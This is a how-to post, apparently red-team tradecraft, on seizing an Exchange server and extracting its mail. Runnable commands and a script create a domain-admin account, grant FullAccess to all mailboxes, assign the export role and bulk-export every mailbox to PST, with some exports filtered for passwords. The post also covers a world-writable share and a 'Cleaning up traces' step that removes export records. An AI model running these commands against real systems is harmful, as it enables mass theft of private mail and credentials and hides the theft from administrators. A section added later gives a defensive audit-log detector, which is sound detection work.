Exporting and viewing Exchange mail PST data

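This article describes in detail how to elevate user privileges on an Exchange server, grant permission to read mail, export user mail addresses, assign management roles, and import and export mail. It also covers managing Exchange management roles and permission groups and the commands for managing Exchange remotely through PowerShell, and it mentions filter conditions for mail export, trace cleanup, and automating these tasks with PowerShell scripts.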


Related commands

# The snap-in name differs between Exchange versions:
Exchange 2007: Add-PSSnapin Microsoft.Exchange.Management.PowerShell.Admin;
Exchange 2010: Add-PSSnapin Microsoft.Exchange.Management.PowerShell.E2010;
Exchange 2013 & 2016: Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;

Granting a user permission to read other users' mail

# Permission to read all mailboxes
Get-Mailbox -ResultSize unlimited -Filter {(RecipientTypeDetails -eq 'UserMailbox') -and (Alias -ne 'Admin')} | Add-MailboxPermission -User AdministratorAccount@contoso.com -AccessRights fullaccess -InheritanceType all

# Grant user a permission to read user b's mailbox
Add-MailboxPermission -Identity ayla@contoso.com -User Ed@contoso.com -AccessRights fullaccess -InheritanceType all

Elevate the user 'scarlet' to domain admin and add it to the Organization Management group

net user scarlet 123456 /add
net group "domain admins" scarlet /add
net group "Organization Management" scarlet /add

Get the mail addresses of all users and export them to all-email.csv

Get-Mailbox -ResultSize Unlimited |select displayname,PrimarySmtpAddress |Export-Csv -Encoding utf8 c:\temp\all-email.csv -NoTypeInformation

Check the export status

Get-MailboxExportRequest

List the groups Exchange has assigned users to

Get-DistributionGroup

Show the details of the IT Security group

Get-DistributionGroup "IT Security" | fl

Get the members of the group

Get-DistributionGroupMember -Identity "IT Security"

Get the mailbox details of the admin user

get-mailboxstatistics -identity admin | Select DisplayName,ItemCount,TotalItemSize,LastLogonTime

Managing Exchange over a remote PowerShell connection

$User = "test\administrator"
$Pass = ConvertTo-SecureString -AsPlainText DomainAdmin123! -Force
$Credential = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Pass
$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://Exchange01.test.com/PowerShell/ -Authentication Kerberos -Credential $Credential
Import-PSSession $Session -AllowClobber

Get-PSSession

Get-Mailbox

List the management roles created in the organization

Get-ManagementRole
Get-ManagementRoleAssignment -role "Mailbox Import Export" | Format-List RoleAssigneeName


Grant administrator the mail import/export permission

EMS must be restarted afterwards

# Create a new Exchange role group and assign it the Mailbox Import Export management role
New-RoleGroup -Name "Enterprise Mail Support" -Roles "Mailbox Import Export" -Members administrator -Description "Import Export_Enterprise Support"
# Create a role assignment named "Import Export_Domain Admins" that gives the user Administrator the Mailbox Import Export role
New-ManagementRoleAssignment -Name "Import Export_Domain Admins"  -User "Administrator" -Role "Mailbox Import Export"

Create a shared folder

mkdir c:\temp\PST
net share test$=c:\temp\PST /GRANT:Everyone,FULL

Exporting mail

# Export all mail in user1's Inbox

Folder names: Inbox, SentItems (sent items), DeletedItems (deleted items), Drafts
Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;
New-MailboxExportRequest -Mailbox user1 -IncludeFolders "#Inbox#" -FilePath "\\hostname\test$\test.pst"

# Export the mail that user Tony received after January 1, 2012 whose body contains "company" and "profit".

New-MailboxExportRequest -Mailbox Tony -ContentFilter {(body -like "*company*") -and (body -like "*profit*") -and (Received -gt "01/01/2012")} -FilePath "\\hostname\test$\test.pst"

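# Export the mail of every user listed in all-email.csv, one PST file per mailbox

$mail = Import-Csv -Path "all-email.csv"
foreach ($user in $mail) {
    # The CSV holds displayname and PrimarySmtpAddress; the address identifies the mailbox unambiguously
    $Address = $user.PrimarySmtpAddress
    # Each request needs its own target file
    New-MailboxExportRequest -Mailbox $Address -FilePath ("\\hostname\test$\" + $Address + ".pst")
}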

Cleaning up traces

Get-MailboxExportRequest -Status Completed | Remove-MailboxExportRequest -Confirm:$false
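
The cleanup above removes only the export request objects. When admin audit logging is enabled, the cmdlets used on this page (role assignment, FullAccess grant, export request, request removal) are still recorded in the Exchange admin audit log. The following is an added example, not part of the original post, that flags this sequence in audit records; the function names are hypothetical and the sample records, callers and dates are constructed.

```powershell
# Added example, not from the original post. Input: records shaped like Search-AdminAuditLog
# output (RunDate, Caller, CmdletName, ObjectModified, CmdletParameters as Name/Value pairs).
function Get-ParamValue($Record, [string]$Name) {
    ($Record.CmdletParameters | Where-Object { $_.Name -eq $Name } | Select-Object -First 1).Value
}

function Find-MailExportActivity {
    param([object[]]$Records, [int]$WindowHours = 24)
    $findings = foreach ($r in ($Records | Sort-Object RunDate)) {
        $reason = switch ($r.CmdletName) {
            'New-ManagementRoleAssignment' { if ((Get-ParamValue $r 'Role') -eq 'Mailbox Import Export') { 'import/export role assigned' } }
            'New-RoleGroup' { if ((Get-ParamValue $r 'Roles') -match 'Mailbox Import Export') { 'role group holding import/export role created' } }
            'Add-MailboxPermission' { if ((Get-ParamValue $r 'AccessRights') -match 'FullAccess') { 'FullAccess granted on a mailbox' } }
            'New-MailboxExportRequest' { 'export request created' }
            'Remove-MailboxExportRequest' { 'export request record removed' }
        }
        if ($reason) {
            [pscustomobject]@{
                RunDate = $r.RunDate; Caller = $r.Caller; Cmdlet = $r.CmdletName
                Target = $r.ObjectModified; Reason = $reason
                FilePath = Get-ParamValue $r 'FilePath'
                AgeLimit = Get-ParamValue $r 'CompletedRequestAgeLimit'
            }
        }
    }
    # Mark exports whose caller removed request records within the window
    foreach ($f in $findings) {
        $cleanup = $findings | Where-Object {
            $_.Cmdlet -eq 'Remove-MailboxExportRequest' -and $_.Caller -eq $f.Caller -and
            $_.RunDate -ge $f.RunDate -and $_.RunDate -le $f.RunDate.AddHours($WindowHours) }
        $flag = ($f.Cmdlet -eq 'New-MailboxExportRequest') -and [bool]$cleanup
        $f | Add-Member -NotePropertyName CleanupFollowed -NotePropertyValue $flag -PassThru
    }
}
# Constructed sample records (callers, dates and objects are made up)
function New-Rec($When, $Caller, $Cmdlet, $Object, [hashtable]$P) {
    [pscustomobject]@{
        RunDate = [datetime]$When; Caller = $Caller; CmdletName = $Cmdlet; ObjectModified = $Object
        CmdletParameters = @($P.GetEnumerator() | ForEach-Object { [pscustomobject]@{ Name = $_.Key; Value = $_.Value } })
    }
}
$sample = @(
    New-Rec '2024-05-01 09:00' 'test.com/Users/scarlet' 'New-ManagementRoleAssignment' 'Import Export_Domain Admins' @{ Role = 'Mailbox Import Export'; User = 'scarlet' }
    New-Rec '2024-05-01 09:05' 'test.com/Users/scarlet' 'New-MailboxExportRequest' 'user1' @{ Mailbox = 'user1'; FilePath = '\\hostname\test$\test.pst' }
    New-Rec '2024-05-01 09:40' 'test.com/Users/scarlet' 'Remove-MailboxExportRequest' 'user1\MailboxExport' @{ Identity = 'user1\MailboxExport' }
    New-Rec '2024-05-01 10:00' 'test.com/Users/helpdesk' 'Set-Mailbox' 'user2' @{ DisplayName = 'User Two' }
)
Find-MailExportActivity -Records $sample | Format-Table RunDate, Caller, Cmdlet, Reason, CleanupFollowed -AutoSize
```

On a server with admin audit logging enabled, pass the output of `Search-AdminAuditLog -StartDate (Get-Date).AddDays(-30)` as `-Records` instead of the sample.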

Connecting to Exchange remotely and exporting mail

# Remote connection
$User = "test\administrator"
$Pass = ConvertTo-SecureString -AsPlainText DomainAdmin123! -Force
$Credential = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Pass
$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://Exchange01.test.com/PowerShell/ -Authentication Kerberos -Credential $Credential
Import-PSSession $Session -AllowClobber

Get-PSSession

Get-Mailbox

Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;

# Add the user administrator to the mail import/export role
New-ManagementRoleAssignment -Role "Mailbox Import Export" -User test\administrator

# Confirm once the assignment has been added
Get-ManagementRoleAssignment -Role "Mailbox Import Export" | fl user

# Export mail

Export directly on the Exchange server

Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;
$User = "test1"
New-MailboxexportRequest -mailbox $User -FilePath ("\\localhost\c$\test\"+$User+".pst")

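PowerShell implementation

You need the credentials of a high-privilege user, or you need to create a user yourself and add it to the Organization Management group.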

DirectExportMailfromExchange -MailBox "test1" -ExportPath "\\localhost\c$\test\" -Filter "{`"(body -like `"*pass*`")`"}" -Version 2013
function DirectExportMailfromExchange
{
#Requires -Version 2.0
<#
.SYNOPSIS
This script will export the mail(.pst) from the Exchange server.
The script needs to be executed on the Exchange server.

Author: 3gstudent

.PARAMETER MailBox
The mail you want to export.

.PARAMETER ExportPath
The export path of the mail.
 
.PARAMETER Filter
The search filter of the mail.

.PARAMETER Version
The version of Exchange.
It can be 2007, 2010, 2013 or 2016.

.EXAMPLE
PS C:\> DirectExportMailfromExchange -MailBox "test1" -ExportPath "\\localhost\c$\test\" -Filter "{`"(body -like `"*pass*`")`"}" -Version 2013
#>
    param (
        [Parameter(Mandatory = $True)]
        [string]$MailBox,
        [Parameter(Mandatory = $True)]
        [string]$ExportPath,
        [Parameter(Mandatory = $True)]
        [string]$Filter,
        [Parameter(Mandatory = $True)]
        [string]$Version
    )

    Write-Host "[>] Start to add PSSnapin" 
    if ($Version -eq 2007)
    {
        Add-PSSnapin Microsoft.Exchange.Management.PowerShell.Admin;
    }

    elseif ($Version -eq 2010)
    {
        Add-PSSnapin Microsoft.Exchange.Management.PowerShell.E2010;
    }

    else
    {
        
        Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;
    }
  
    Write-Host "[+] Start to export mail" 
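    # Export mail and do not keep the completed export request (-CompletedRequestAgeLimit 0)
    # Note: the -Filter parameter is not used here; the content filter below is fixed to body -like "*pass*"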
    New-MailboxexportRequest -mailbox $MailBox -ContentFilter {(body -like "*pass*")} -FilePath ($ExportPath+$MailBox+".pst") -CompletedRequestAgeLimit 0
    Write-Host "[+] All done."
}

Viewing PST file data

Opening and closing a PST file

You can also use this tool: pst viewer

Supplement

Adding an administrator user from the command line

powershell -c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;$pwd=convertto-securestring Password123 -asplaintext -force;New-Mailbox -UserPrincipalName testuser1@test.com -OrganizationalUnit test.com/Users -Alias testuser1 -Name testuser1 -DisplayName testuser1 -Password $pwd;Add-RoleGroupMember \"Organization Management\" -Member testuser1 -BypassSecurityGroupManagerCheck"

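Setting up Exchange

  1. Promote the server to a domain controller
  2. Add the IIS, DNS and AD services
  3. Join the domain
  4. The user who logs in to Exchange must be a member of the domain admin, enterprise admin and schema admin groups
  5. Open the Exchange ISO, start cmd and run setup /IAcceptExchangeServerLicenseTerms_DiagnosticDataOFF /prepareschema
  6. Click setup.exe to install
  7. Create mailboxes for users, either through the web interface on the Exchange server or from the command line with the following commands:
# Add a mailbox for Zhang San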
Enable-Mailbox -Identity zhangsan@test.com -Database UsersMailboxDatabase
# Add mailboxes for all users
Get-User -RecipientTypeDetails User -Filter "UserPrincipalName -ne `$null" -ResultSize unlimited | Enable-Mailbox
# Create a mailbox for a new user
New-Mailbox -Name "Pilar Pinilla" -UserPrincipalName pilarp@contoso.com -Password (ConvertTo-SecureString -String 'Pa$$word1' -AsPlainText -Force) -FirstName Pilar -LastName Pinilla

